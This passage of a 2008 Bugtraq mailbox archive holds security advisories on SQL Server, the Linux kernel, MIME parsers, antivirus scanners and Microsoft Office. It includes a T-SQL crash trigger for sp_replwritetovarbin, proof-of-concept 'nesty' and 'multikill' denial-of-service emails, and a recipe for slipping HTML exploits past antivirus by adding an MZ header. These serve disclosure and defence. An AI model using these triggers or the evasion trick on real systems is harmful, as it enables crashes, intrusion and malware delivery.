to trigger a memory write to a controlled location. Depending on the
underlying Windows version, it is / may be possible to use this
vulnerability to execute arbitrary code in the context of the vulnerable
SQL server process.
In a default configuration, the sp_replwritetovarbin stored procedure is
accessible by anyone. The vulnerability can be exploited by an
authenticated user with a direct database connection, or via SQL
injection in a vulnerable web application.


Vulnerability details:
----------------------

The following T-SQL script can be used to test for the vulnerability:


--------------------------------
DECLARE @buf NVARCHAR(4000),
@val NVARCHAR(4),
@counter INT

SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int,
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1,
  @end_offset output,
  @vb_buffer output,
  @vb_bufferlen output,'''

SET @val = CHAR(0x41)

SET @counter = 0
WHILE @counter < 3000
BEGIN
  SET @counter = @counter + 1
  SET @buf = @buf + @val
END

SET @buf = @buf + ''',''1'',''1'',''1'',
''1'',''1'',''1'',''1'',''1'',''1'''

EXEC master..sp_executesql @buf
--------------------------------


This triggers an access violation exception (write to address
0x41414141).
The vulnerability has been successfully used to execute arbitrary code
on a lab machine.
SEC Consult will not release code execution exploits for this
vulnerability to the public.


Workaround:
-----------

Remove the sp_replwriterovarbin extended stored procedure. Run the
following as an administrator:

execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'

See also:

"Removing an Extended Stored Procedure from SQL Server"
http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx


Patch:
------

According to an email received by Microsoft in September, a fix for this
vulnerability has been completed.
The release schedule for this fix is currently unknown.


Vendor timeline:
---------------
Vendor notified: 2008-04-17
Vendor response: 2008-04-17
Last response from Microsoft: 09-29-2008
Request for update status 1: 10-14-2008
Request for update status 2: 10-29-2008
Request for update status 3: 11-12-2008
Request for update status 4
and prenotification about advisory release date: 11-28-2008
Public release: 11-09-2008

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2008


From - Tue Dec  9 12:09:50 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f70
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38871-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id B7CBEEC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 12:00:29 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id BA80B143B3E; Tue,  9 Dec 2008 08:56:58 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18571 invoked from network); 9 Dec 2008 16:05:20 -0000
X-Authentication-Warning: logo.rdu.rpath.com: jmforbes set sender to rPath Update Announcements <announce-noreply@rpath.com> using -r
Date: Tue, 09 Dec 2008 11:21:52 -0500
From: rPath Update Announcements <announce-noreply@rpath.com>
To: security-announce@lists.rpath.com,
update-announce@lists.rpath.com, product-announce@lists.rpath.com,
security-announce@lists.rpath.com, update-announce@lists.rpath.com,
product-announce@lists.rpath.com
Cc: full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
bugtraq@securityfocus.com, lwn@lwn.net,
full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
bugtraq@securityfocus.com, lwn@lwn.net
Subject: rPSA-2008-0332-1 kernel
Message-ID: <493e9b20.6LGwMhogBQbBn1pq%announce-noreply@rpath.com>
User-Agent: nail 11.22 3/20/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:   

rPath Security Advisory: 2008-0332-1
Published: 2008-12-09
Products:
    rPath Appliance Platform Linux Service 1
    rPath Appliance Platform Linux Service 2
    rPath Linux 1
    rPath Linux 2

Rating: Major
Exposure Level Classification:
    Local User Non-deterministic Privilege Escalation
Updated Versions:
    kernel=conary.rpath.com@rpl:1-vmware/2.6.26.8-0.2-1
    kernel=conary.rpath.com@rpl:1/2.6.26.8-0.2-1
    kernel=conary.rpath.com@rpl:2/2.6.26.8-2-0.1
    kernel=rap.rpath.com@rpath:linux-1/2.6.26.8-2-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2915

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5079
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5182
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5300

Description:
    Previous versions of the kernel package contain multiple
    vulnerabilities.  The inotify functionality may allow local
    users to gain privileges via unknown vectors related to race
    conditions in inotify watch removal and umount.  Additionally,
    there are two Denial of Services vulnerabilities, including one 
    in which a local user may cause a "soft" system lock-up.
    
    This update requires a system reboot to implement the fixes.

http://wiki.rpath.com/Advisories:rPSA-2008-0332

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From - Tue Dec  9 12:29:50 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f72
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38872-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 046B9EC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 12:22:57 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C990E236F5D; Tue,  9 Dec 2008 10:09:44 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19928 invoked from network); 9 Dec 2008 16:36:28 -0000
Date: Tue, 9 Dec 2008 19:53:27 +0300
From: "Vladimir '3APA3A' Dubrovin" <3APA3A@SECURITY.NNOV.RU>
Reply-To: "Vladimir '3APA3A' Dubrovin" <3APA3A@SECURITY.NNOV.RU>
Organization: http://www.security.nnov.ru
X-Priority: 3 (Normal)
Message-ID: <617903480.20081209195327@SECURITY.NNOV.RU>
To: bruhns@recurity-labs.com
Cc: bugtraq@securityfocus.com
Subject: Re: DoS attacks on MIME-capable software via complex MIME emails
In-Reply-To: <20081208225217.10144.qmail@securityfocus.com>
References: <20081208225217.10144.qmail@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit
Status:   

Dear bruhns@recurity-labs.com,

Idea  is  not new. Same vulnerabilit was reported for Agnitum Outpost by
Alexander Andrusenko in 2004, http://securityvulns.com/news3687.html

Also,   same   vulnerabilities  were  reported  and  fixed  in  Sendmail
(CVE-2006-1173).

--Tuesday, December 9, 2008, 1:52:17 AM, you wrote to bugtraq@securityfocus.com:

brlc> == DoS attacks on MIME-capable software via complex MIME emails =
brlc> == Preface =brlc> On the phneutral 0x7d8 and RSS 08, I gave short talks on a widely unregarded
brlc> problem with MIME software. Due to popular demand, I decided to publish a
brlc> short writeup of the talk.

brlc> == What is MIME? =brlc> MIME is the standard format for email-messages. One could say, MIME is for
brlc> email, what html is for the web. The first RFC for MIME was published in
brlc> 1992, RFC 1341. The current standard is specified in RFC 2045 from 1996.
brlc> MIME is a recursive data format. MIME objects consist of a header and a
brlc> body, where the content-type field of the header specifies the type of the
brlc> body. The body can consist of several separated MIME-objects, a single
brlc> MIME-object, a block of text, an encoded image or about anything specified
brlc> in the header. It is possible to read some real-world examples by opening
brlc> some emails and hitting "show source".

brlc> == Two examples to illustrate MIME =brlc> The first example is the content-type:message/rfc822, which is intended for
brlc> forwarding emails. The following body is a complete email, which starts
brlc> again with a header, followed by a body. The second example is the
brlc> content-type:multipart/mixed. A pretty much self-explanatory example is
brlc> provided below. The parts of the body are separated by strcat("--",
brlc> boundary) and the body must be ended by strcat("--", boundary, "--").

brlc> From: <bruhns@hell>
brlc> To: <foo@bar>
brlc> Subject: example
brlc> MIME-Version: 1.0
brlc> Content-Type: multipart/mixed; boundary="n"

brlc> --n
brlc> content-type:text/plain

brlc> this is some plain text.
brlc> --n
brlc> content-type:message/rfc822

brlc> From: <bruhns@hell>;
brlc> Subject: example 2

brlc> This is not a MIME-mail, since the mime-version field is missing! However,
brlc> most software does not care.
brlc> --n--

brlc> == The problem =brlc> Even though MIME is pretty old, many people have not yet learned how to
brlc> parse MIME correctly. The problem is that the number of MIME-parts of an
brlc> email and the depth of recursion is potentially unlimited. Some software
brlc> like the popular rfc2045 library of the courier-mta solve this problem by
brlc> discarding mails with too many MIME-parts as a Denial of Service attack.
brlc> This is probably the best approach to handle this problem.

brlc> == Proof-of-Concept: Nesty =brlc> The nesty attack abuses the message/rfc822 type. The following example
brlc> crashes a lot of software, which tries to parse it recursively and
brlc> therefore overflows its stack:

brlc> Content-type: message/rfc822;

brlc> Content-type: message/rfc822;

brlc> Content-type: message/rfc822;

brlc> Content-type: message/rfc822;

brlc> ... about 200kb. Note that this mail is not compliant to the rfc2045, since
brlc> the mime-version field is missing. However, most software does not care and
brlc> a lot of it chokes on this mail. In order to attack more rfc-abiding
brlc> software (mostly open-source), one can easily adapt the nesty mail to be
brlc> compliant. This however increases the size of the mail considerably, which
brlc> somehow takes away the elegance of crashing a server with only 200kb.


brlc> == Proof-of-Concept: Multikill =brlc> The multikill attack abuses the multipart/mixed type by creating an overly
brlc> large number of MIME-parts. Multipart/mixed could be used in a recursive
brlc> way, but this is not even needed for this attack. A lot of software freezes
brlc> upon the following example:

brlc> From: <bruhns@hell>
brlc> To: <foo@bar>
brlc> Subject: multikill
brlc> MIME-Version: 1.0
brlc> Content-Type: multipart/mixed; boundary="n"


brlc> --n

brlc> b

brlc> --n

brlc> ... about 800kb or 70000 parts. For a lot of software, about 216 seems to
brlc> be the barrier, so you can't craft much more compact multikill attacks.

brlc> --n

brlc> b

brlc> --n--

brlc> == Impact =brlc> Firstly, the attack is DoS only. At this point it seems rather unlikely,
brlc> that command execution can be crafted on the basis of this problem.
brlc> However, the DoS vulnerability exposed by these proof-of-concept mails is
brlc> shared by many systems by different vendors and is trivial to exploit. The
brlc> ramnifications of this attack are therefore not really known yet. There is
brlc> still much testing to do.

brlc> And at last, there does not only exist a problem with emails with to many
brlc> MIME parts, but there exists a whole problem class and a whole class of
brlc> attacks, which are insufficiently researched and regarded by now. Of these
brlc> attacks, DoS via malformed MIME emails, the nesty and multikill mails are
brlc> only the first examples, the tip of the iceberg, so to say; once software
brlc> has been patched to correctly handle these emails, other people will come
brlc> up with other examples of malformed emails. To look at this attack even
brlc> more broadly, the topic of DoS attacks via overly complex instances of
brlc> recursive data types is not researched sufficiently.

brlc> == Effects on Outlook Express =brlc> Outlook freezes on the multikill mail. Outlook starts parsing emails while
brlc> downloading them. Upon parsing a multikill mail with more than about 216
brlc> parts, some library function goes into an endless loop. Outlook never
brlc> finishes downloading the multikill mail, it stays in the mailbox. Outlook
brlc> never closes the connection to the mail server, which is not nice to the
brlc> mailserver. Outlook can only be stopped by killing the process from the
brlc> task manager.

brlc> To be more exact, the bug seems to reside in InetComm.dll in the
brlc> MimeOleClearDirtyTree function. I would guess at a short-integer overflow,
brlc> which results in the infinite loop.

brlc> Microsoft was informed on 29.07.08 and declined to comment on this issue.

brlc> == Effects on Virusscanners =brlc> NOD32 takes several minutes of kerneltime to scan the multikill mails. ESET
brlc> did not comment on this issue and was informed on 01.08.08.
brlc> Kaspersky Internet Security Suite takes several minutes to scan the
brlc> multikill mail. Kaspersky was informed on 29.07.08, confirmed the issue and
brlc> promised to fix the problem.
brlc> Norton Antivirus takes several minutes to scan the multikill mails. Norton
brlc> was informed on informed 01.08.08 and answered promptly and politely.
brlc> Norton promised not to fix the problem, since it would not qualify as a
brlc> Denial of Service vulnerability.


brlc> == Specific Software =brlc> Vulnerable:
brlc> Microsoft Outlook Express 6, Version 6.00.2900.5512
brlc> Opera Version: 9.51 Build: 10081 System: Windows XP
brlc> Incredimail Build ID: 5853710 Setup ID: 7 Pn: 92977368
brlc> Norton Internet Security Version 15.5.0.23
brlc> ESet NOD32 2.70.0039.0000
brlc> Kaspersky Internet Security 2009; Databases from 23.07.2008

brlc> Slightly affected:
brlc> Mozilla Thunderbird Version 2.0.14 (20080421)

brlc> Not vulnerable:
brlc> Avira Antivir Search engine: v8.01.01.11, 17.07.2008
brlc> Mutt
brlc> Courier

brlc> == Correct handling of overly complex messages= =brlc> There exist examples of software, which excellently handles overly complex
brlc> MIME-mails. One is the rfc2045 -library of the courier-mta. Quote from the
brlc> man 3 rfc2045:

brlc> The rfcviolation field in the top-level rfc2045 indicates any errors found
brlc> while parsing the MIME message.
brlc>  rfcviolation is a bitmask of the following flags:

brlc> [...]
brlc> RFC2045_ERR2COMPLEX
brlc>     The message has too many MIME sections, this is a potential
brlc> denial-of-service attack.
brlc> RFC2045_ERRBADBOUNDARY
brlc>     Ambiguous nested multipart MIME boundary strings. (Nested MIME boundary
brlc> strings where one string is a prefix of another string).

brlc> Inspection of the source code reveals, that the parser of the courier-mta
brlc> allows only 300 mime parts and a nesting depth of 30 levels. Since courier
brlc> seems not to get too many complaints, this is probably a reasonable limit.

brlc> == History of this bug =brlc> I (re)discovered the bug independently in mid 2007. The bug was however
brlc> known before. There are some advisories like secunia.com/advisories/11360/
brlc> (for Eudora, bug still unfixed) by people who discovered the problem
brlc> before, but did not publicly announce or did not see the scope of it. More
brlc> recently, there has been a likewise advisory for sendmail, CVE-2006-1173.
brlc> There have been other advisories for different antivirus solutions. This
brlc> bug is not 0-day at all, it is really old. If you find older advisories,
brlc> which cover this bug, or knew it before, mail me so I can update this
brlc> section.

brlc> == Credit =brlc> This bug was discovered by Bernhard 'Bruhns' Brehm at Recurity Labs.
brlc> Company page: http://www.recurity-labs.com
brlc> Email-address: bruhns@recurity-labs.com
brlc> Wiki for further problem discussion: http://mime.recurity.com

brlc> Thanks to FX, Fabs and joern for various help.

brlc> Cheers,
brlc> Bruhns




-- 
~/ZARAZA http://securityvulns.com/
������ ���� ��� ���������� ����� - �������.
�� ��� �����, ������ ����������.  (���)

From - Tue Dec  9 13:39:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f75
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38870-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 505F0EC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 13:38:32 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id D4BFC1439DC; Tue,  9 Dec 2008 08:54:45 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19515 invoked from network); 9 Dec 2008 16:23:40 -0000
Date: 9 Dec 2008 16:34:48 -0000
Message-ID: <20081209163448.29820.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: xhakerman2006@yahoo.com
To: bugtraq@securityfocus.com
Subject: Multiple Vendor Anti-Virus Software Malicious WebPage Detection
 Bypass -Update-
Status:   

Litel Update.
in the previous advisory there was some wrong report because of, the update of anti-virus product version.
********************************************************************************************
Multiple Vendor Anti-Virus Software Malicious WebPage Detection Bypass
           [_] Discovred by : DATA_SNIPER
           [_] Greets to:  hacker c&c Team , Arab4Services team on www.arab4services.net , AT4RE Team on www.at4re.com
           [_] Special thanks go to: Andrey Bayora and all arabian hackers specialy algerian hackers.
NOTIFICATION:
this exploit are based on Andrey Bayora "magic of magic byte" but with some development.
This proof of concept was created for educational purposes only,Use the code it at your own risk.
The author will not be responsible for any damages.
*********************************************************************************************
Exploit Information:
    Date: 2008/19/08
    Impact: Baypassing the Detection of  Malicious web page that can compromise a user's system
Vulnerabled AV-Software:
   ESET Smart Security Latest Version<=(the Exploit was dedicated for it)
   AhnLab-V3 2008.12.4.1
   AntiVir 7.9.0.36 2008.12.04
   Avast 4.8.1281.0
   CAT-QuickHeal 10.00
   ClamAV 0.94.1
   DrWeb 4.44.0.09170
   Ewido 4.0
   Ikarus T3.1.1.45.0
   K7AntiVirus 7.10.541
   NOD32 3662
   Norman 5.80.02
   Panda 9.0.0.4
   Prevx1 V2
   Rising 21.06.31.00
   SecureWeb-Gateway
   Sunbelt 3.1.1832.2
   TheHacker 6.3.1.2.174
   TrendMicro 8.700.0.1004
   ViRobot  2008.12.4.1499
the things that must be considered that the POC it's variant  from exploit to exploit(some times
Kaspersky and the other famous AV Sofware can be  deceive).
Proof Of Concept:
as i said the exploit are based on the magic of magic byte methode we will first add the MZ Header to the HTML Exploit and  change the exstention to txt or jpg or non extension,the exploit is compatible with IE6 and IE7 because IE6&7  execute the HTML Event if it's in txt file or non extension files.
so the exploit it's with corporate of IE6&7 :).
virustotal result of  MS Internet Explorer 6/7 (XML Core Services)  Remote Code Execution Exploit
http://www.virustotal.com/analisis/2fce2b49876e27b4144fd39be466200e
and print screen for the scann in VirusTotal.
http://members.lycos.co.uk/datasniper/a.jpg
http://members.lycos.co.uk/datasniper/b.jpg
http://members.lycos.co.uk/datasniper/c.jpg
POC:
1-add the MZ Header to the HTML file:
MZ&#1711;       &#1746;&#1746;  �       @                                   &#1591;   &#1563; �    &#1581;!�
L&#1581;!This program cannot be run in DOS mode.
you can put other EXE info on the HTML Body for more deception.
-rename the HTML to non extension file or txt or jpg.
3-upload it to webserver.
    http://localhost/mallpage.txt or http://localhost/mallpage<non extenstion>.
video POC:
Simple video explain how the vulnerability can be exploited  under ESET Smart Security (arabic).
------------------------------

From - Tue Dec  9 14:29:50 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f78
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38873-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 6F190EC13D
for <lists@securityspace.com>; Tue,  9 Dec 2008 14:20:04 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id A9A35143809; Tue,  9 Dec 2008 10:59:43 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24219 invoked from network); 9 Dec 2008 18:25:58 -0000
Date: Tue, 9 Dec 2008 19:38:46 +0100
Message-Id: <200812091838.mB9IckQm029383@ca.secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: Microsoft Word RTF Polyline/Polygon Integer Overflow
From: Secunia Research <remove-vuln@secunia.com>
Status:   

=====================================================================
                     Secunia Research 09/12/2008

        - Microsoft Word RTF Polyline/Polygon Integer Overflow -

=====================================================================Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

=====================================================================1) Affected Software 

* Microsoft Office Word 2003 SP3
* Microsoft Office Word Viewer 2003 SP3

NOTE: Other versions may also be affected.

=====================================================================2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

=====================================================================3) Vendor's Description of Software 

"Office Word ... provides editing and reviewing tools that help you
create professional documents more easily than ever before."

Product Link:
http://office.microsoft.com/en-us/word/default.aspx

=====================================================================4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Office 
Word, which can be exploited by malicious people to compromise a 
user's system.

The vulnerability is caused due to an integer overflow error when 
calculating the space required for the specified number of points in 
a polyline or polygon. This can be exploited to cause a heap-based 
buffer overflow during parsing of objects in Rich Text Format (.rtf) 
files e.g. when a user opens a specially crafted .rtf file with Word 
or previews a specially crafted e-mail.

Successful exploitation may allow execution of arbitrary code.

=====================================================================5) Solution 

Apply patches from MS08-072.

=====================================================================6) Time Table 

16/05/2008 - Vendor notified.
16/05/2008 - Vendor response.
03/07/2008 - Vendor provides status update.
15/08/2008 - Status update requested from vendor.
15/08/2008 - Vendor provides status update.
30/09/2008 - Vendor provides status update.
09/12/2008 - Vendor acknowledges that fix will be issued today.
09/12/2008 - Vendor publishes security bulletin.
09/12/2008 - Public disclosure.

=====================================================================7) Credits 

Discovered by Dyon Balding, Secunia Research.

=====================================================================8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2008-4025 for the vulnerability.

MS08-072 (KB957173):
http://www.microsoft.com/technet/security/Bulletin/MS08-072.mspx

=====================================================================9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-21/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================
From - Tue Dec  9 14:29:50 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f79
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38874-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 425D1EC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 14:25:16 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id E51C12370CB; Tue,  9 Dec 2008 12:10:44 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25017 invoked from network); 9 Dec 2008 18:53:22 -0000
Date: Tue, 9 Dec 2008 20:06:04 +0100
Message-Id: <200812091906.mB9J64cl000492@ca.secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: Microsoft Excel NAME Record Array Indexing Vulnerability
From: Secunia Research <remove-vuln@secunia.com>
Status:   

=====================================================================
                     Secunia Research 09/12/2008

     - Microsoft Excel NAME Record Array Indexing Vulnerability -

=====================================================================Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

=====================================================================1) Affected Software 

* Microsoft Office Excel 2000 SP3
* Microsoft Office Excel 2002 SP3

NOTE: Other versions may also be affected.

=====================================================================2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

=====================================================================3) Vendor's Description of Software 

"Organize, analyze and present your data with precision and panache."

Product Link:
http://office.microsoft.com/en-us/excel/

=====================================================================4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Excel,
which can be exploited by malicious people to compromise a user's 
system.

The vulnerability is caused due to insufficient validation of an index
value in the NAME record and can be exploited to corrupt memory via a
specially crafted Excel Spreadsheet (XLS) file.

Successful exploitation may allow execution of arbitrary code.

=====================================================================5) Solution 

Apply patches from MS08-074.

=====================================================================6) Time Table 

02/09/2008 - Vendor notified.
03/09/2008 - Vendor response.
17/09/2008 - Vendor provides status update.
09/12/2008 - Vendor acknowledges that fix will be issued today.
09/12/2008 - Vendor publishes security bulletin.
09/12/2008 - Public disclosure.

=====================================================================7) Credits 

Discovered by Dyon Balding, Secunia Research.

=====================================================================8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2008-4266 for the vulnerability.

MS08-074 (KB959070):
http://www.microsoft.com/technet/security/Bulletin/MS08-074.mspx

=====================================================================9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-36/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================
From - Tue Dec  9 15:59:51 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f7e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38875-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 92FCAEC13C
for <lists@securityspace.com>; Tue,  9 Dec 2008 15:58:56 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id AFD6C1438A3; Tue,  9 Dec 2008 12:09:23 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 26906 invoked from network); 9 Dec 2008 19:32:24 -0000
X-PGP-Universal: processed;
by reflex on Tue, 09 Dec 2008 17:49:37 -0200
Message-ID: <493ECBD0.1010907@coresecurity.com>
Date: Tue, 09 Dec 2008 17:49:36 -0200
From: CORE Security Technologies Advisories <advisories@coresecurity.com>
Organization: CORE Security Technologies
MIME-Version: 1.0
To: vulnwatch <vulnwatch@vulnwatch.org>,
bugtraq <bugtraq@securityfocus.com>,
full-disclosure@lists.grok.org.uk
Subject: CORE-2008-1127 - Vinagre show_error() format string vulnerability
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

